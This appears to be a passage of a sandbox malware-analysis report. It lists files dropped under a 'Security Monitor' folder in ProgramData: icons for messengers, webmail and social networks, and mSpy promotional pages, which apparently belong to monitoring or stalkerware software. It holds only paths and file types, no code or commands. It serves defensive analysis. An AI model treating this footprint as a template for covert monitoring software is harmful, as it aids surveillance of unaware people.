|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-PEDA6.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-PH1G5.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-Q4NET.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-UH1T8.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-UH2FQ.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-VLETQ.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\none.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\qip.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\skype.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\slack.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\trillian.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\IM.ini (copy)
|
Generic INItialization configuration [Zoom]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-2TRA1.tmp
|
Generic INItialization configuration [Zoom]
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\is-NTLRI.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\ru\is-6LNCU.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\default.ini (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\zh\is-DML6U.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\1.html (copy)
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\business-analyt-sprite.png (copy)
|
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\green_action_btns.png (copy)
|
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-023FE.tmp
|
PNG image data, 210 x 336, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\is-UIB0G.tmp
|
PNG image data, 1122 x 60, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_block.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_cal.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_chat.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_device1.png (copy)
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_gps.png (copy)
|
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_rest.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\ic_web.png (copy)
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-8VMRU.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-90G1A.tmp
|
PNG image data, 66 x 67, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-DM7VE.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-EHG83.tmp
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-ENJMA.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-EOMK7.tmp
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-I8Q5V.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\is-TGDMF.tmp
|
PNG image data, 58 x 60, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\img\products_page\logos.png (copy)
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\is-DHNA5.tmp
|
HTML document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\anythingslider.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\blue-arr-buy.png (copy)
|
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\core-ui-select.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\ic_device1.png (copy)
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-1O11V.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-6P1D7.tmp
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-8VVPL.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-AETIL.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-GTEAT.tmp
|
PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-HQ5K3.tmp
|
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-HQP5I.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-MTML6.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-NDCLE.tmp
|
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-OVOBQ.tmp
|
PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\is-VDV7M.tmp
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\logos.png (copy)
|
PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\main.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\mspy_products_home_slide1.png (copy)
|
PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\photo1.png (copy)
|
PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\print.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\reset.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\PR\1\mSpy\widgets.css (copy)
|
ASCII text
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\GMX.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Gmail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.RU.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Mail.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Outlook.Live.com.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yahoo Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\Yandex Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\facebook.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\google+.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\imp.free.fr.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\instagram.png (copy)
|
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-07K37.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-0B2U0.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-38H15.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-4CQDQ.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-5LGT6.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-63FTM.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-66O2J.tmp
|
PNG image data, 16 x 16, 8-bit colormap, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-6OG7U.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7135Q.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7HRN7.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7N95R.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-7ST0G.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-8J0JN.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-8JN9D.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-9TJI2.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-AHVHO.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-B4IQ8.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-C0J4H.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-CF51J.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-DBF37.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-DQUUK.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-ELNCN.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-EPNQ5.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-EROC8.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-H3K59.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-I0IV2.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-KOOLK.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-LNHUS.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-MP9QP.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-N31GE.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-O07NB.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-OFQD7.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-OTEOD.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-PSVLI.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-PUK8L.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-QQ5EP.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-R183T.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-RMPPM.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-T356B.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-T69MP.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-UL9VS.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-V4PC2.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-V5JDN.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\is-VQSO6.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\linkedin.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\messagerie.orange.fr.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\SNets\16x16\my.screenname.aol.com.png (copy)
|
